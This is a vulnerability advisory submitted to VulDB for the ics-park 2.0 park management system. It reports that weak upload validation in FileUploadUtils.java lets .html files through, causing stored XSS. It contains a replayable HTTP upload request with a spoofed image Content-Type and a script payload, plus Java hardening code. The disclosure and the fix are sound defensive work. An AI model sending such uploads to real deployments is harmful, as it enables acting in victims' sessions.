Submission #646303: fcba_zzm ics-park 2.0 Unrestricted Upload Information

Title: fcba_zzm ics-park 2.0 Unrestricted Upload
Description:

ICS-Park Improper File Upload Extension Validation Leading to Stored Cross-Site Scripting (XSS)

# NAME OF AFFECTED PRODUCT(S)

* ics-park

## Vendor Homepage

https://gitee.com/fcba_zzm/

# AFFECTED AND/OR FIXED VERSION(S)

## Submitter

* yyjccc

## Vulnerable File

* FileUploadUtils.java

## Version(s)

* V2.0

## Software Link

* [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park)

# PROBLEM TYPE

## Vulnerability Type

* Improper file upload validation → stored XSS

## Root Cause

The vulnerability originates from improper validation of uploaded file types in the ICS-Park file upload module (`FileUploadUtils.java`). The upload handler performs only weak or incomplete checks on the file extension, so files of dangerous types such as `.html` and `.xml` are accepted. Because uploaded files are stored in a web-accessible location and served back without proper content-type enforcement or sanitization, the browser interprets them as HTML and executes any script they contain, in the origin of the ics-park server.

## Impact

Script in an uploaded file runs with the victim's session in the ics-park origin, so an attacker who lures an authenticated user to the file's URL can perform actions on that user's behalf, such as changing the password or modifying account settings, without the user's consent. Successful exploitation can lead to:

* Unauthorized account access or data manipulation.
* Privilege escalation or unauthorized actions performed on behalf of the user.
* Potential data loss or unauthorized data leakage.

# DESCRIPTION

ICS-Park does not strictly restrict dangerous file extensions on upload, so an attacker can upload files such as `.html` or `.xml`. When a victim opens the stored file, the browser renders it directly and executes any embedded JavaScript. This is a **stored Cross-Site Scripting (XSS)** vulnerability, exploitable by an authenticated attacker who can reach the upload endpoint.
# Vulnerability details and POC

## Vulnerability location

* **`FileUploadUtils.java`**

## Payload

Log in to the system and upload the file with the following request. Note that the multipart part declares `Content-Type: image/jpeg` while the filename is `xx.html`; the part's Content-Type is attacker-controlled and proves nothing about the content. The `token` and `sign` headers are the tester's session values and the `Content-Length` is from the original capture, so both must be replaced or recomputed when replaying.

```http
POST /api/dfs/upload HTTP/1.1
Host: localhost:9227
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Origin: http://localhost:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJdOygUAQDhzw1zAy
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Accept: application/json, text/plain, */*
token: d6e3601d372b42ffb2eaad21aa6b3598
sign: 96782c8471657d1505b795009245cef0
Sec-Fetch-Dest: empty
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Sec-Fetch-Mode: cors
Referer: http://localhost:8000/account/settings/base
Content-Length: 16305

------WebKitFormBoundaryJdOygUAQDhzw1zAy
Content-Disposition: form-data; name="file"; filename="xx.html"
Content-Type: image/jpeg

hi,test!<script>alert('xss')</script>
------WebKitFormBoundaryJdOygUAQDhzw1zAy--
```

## Screenshots

The following screenshots, taken during testing, show the accepted upload and the rendered payload:

![Screenshot 1](https://github.com/user-attachments/assets/88cb862c-a6fd-4130-9488-a20c7985d9a0)

![Screenshot 2](https://github.com/user-attachments/assets/12a7c689-0a8e-4ae7-9204-ea893fcce1a8)

# Suggested repair

1. **Strict file extension whitelisting**: only allow safe extensions (e.g., `.jpg`, `.png`, `.gif`) and reject everything not on the list, which covers `.xml` and `.html`; the check must be on the filename the server normalises, not on the client-supplied Content-Type.
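The following is an added example, not code from the ics-park project or from the submitter. It places the weak pattern the advisory describes (a short denylist plus trust in the multipart part's Content-Type, which the `xx.html` / `image/jpeg` request above passes) beside a whitelist-based check, a random server-side storage name and headers for serving the stored file so it is never rendered in the application's origin. The whitelist contents, the method names and the assumption that ics-park serves uploads from its own origin are illustrative, not taken from `FileUploadUtils.java`.

```java
import java.util.Locale;
import java.util.Map;
import java.util.Set;
import java.util.UUID;

/**
 * Added example (not ics-park's FileUploadUtils.java): weak denylist/client-MIME check
 * next to a whitelist check plus safe storage and serving rules. The whitelist, the
 * method names and the serving headers are assumptions for illustration.
 */
public final class UploadExtensionCheck {

    /** Assumed whitelist of extensions the application needs to accept. */
    private static final Set<String> ALLOWED = Set.of("jpg", "jpeg", "png", "gif");

    /** Server-chosen MIME type per validated extension; never taken from the request. */
    private static final Map<String, String> MIME = Map.of(
            "jpg", "image/jpeg", "jpeg", "image/jpeg",
            "png", "image/png", "gif", "image/gif");

    /**
     * Weak pattern: a denylist of server-side script extensions plus trust in the
     * Content-Type the client put on the multipart part. The advisory's request
     * (filename="xx.html", Content-Type: image/jpeg) satisfies both conditions.
     */
    static boolean weakCheck(String filename, String partContentType) {
        String lower = filename.toLowerCase(Locale.ROOT);
        boolean denied = lower.endsWith(".jsp") || lower.endsWith(".jspx") || lower.endsWith(".php");
        return !denied && partContentType.startsWith("image/");
    }

    /**
     * Hardened check: returns the normalised extension if the name is acceptable, otherwise null.
     * Only the final path component is examined, control characters (including NUL) are
     * rejected, a missing extension or trailing dot is rejected, and the extension must be
     * on the whitelist. The client's Content-Type is deliberately ignored.
     */
    static String allowedExtension(String filename) {
        if (filename == null || filename.isEmpty()) {
            return null;
        }
        int cut = Math.max(filename.lastIndexOf('/'), filename.lastIndexOf('\\'));
        String base = filename.substring(cut + 1);
        for (int i = 0; i < base.length(); i++) {
            char c = base.charAt(i);
            if (c < 0x20 || c == 0x7f) {
                return null;
            }
        }
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || dot == base.length() - 1) {
            return null;
        }
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED.contains(ext) ? ext : null;
    }

    /** Store under a random server-generated name that carries only the validated extension. */
    static String storedName(String ext) {
        return UUID.randomUUID() + "." + ext;
    }

    /**
     * Headers for serving a stored upload: MIME type from the validated extension, content
     * sniffing disabled, and the file offered as a download so the browser never renders it
     * in the application's origin even if a risky type were later added to the whitelist.
     */
    static Map<String, String> serveHeaders(String ext) {
        return Map.of(
                "Content-Type", MIME.get(ext),
                "X-Content-Type-Options", "nosniff",
                "Content-Disposition", "attachment");
    }

    public static void main(String[] args) {
        // Constructed test names: the advisory's payload name, a NUL-byte variant,
        // a mixed-case image, a traversal-style name with a denied type, no extension, trailing dot.
        String[] names = {"xx.html", "xx.html" + (char) 0 + ".jpg", "photo.PNG",
                "../../cfg.xml", "noext", "dot."};
        for (String n : names) {
            String ext = allowedExtension(n);
            System.out.printf("%-22s weakCheck=%-5s allowedExtension=%s%n",
                    n.replace(String.valueOf((char) 0), "\\0"), weakCheck(n, "image/jpeg"), ext);
            if (ext != null) {
                System.out.println("  store as " + storedName(ext) + ", serve with " + serveHeaders(ext));
            }
        }
    }
}
```

The whitelist test runs on the filename only; nothing the client sends in `Content-Type` influences the decision, and the stored name discards the original filename entirely, so a later change to how files are served cannot resurrect an `.html` name.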
Source: https://github.com/Yyjccc/CVE/issues/2
User: Yyjccc (UID 89726)
Submitted: 2025-09-02 18:26 (8 months ago)
Moderated: 2025-09-13 21:23 (11 days later)
Status: Accepted
VulDB entry: 323833 [fcba_zzm ics-park Smart Park Management System 2.0 FileUploadUtils.java File Privilege Escalation]
Points: 20
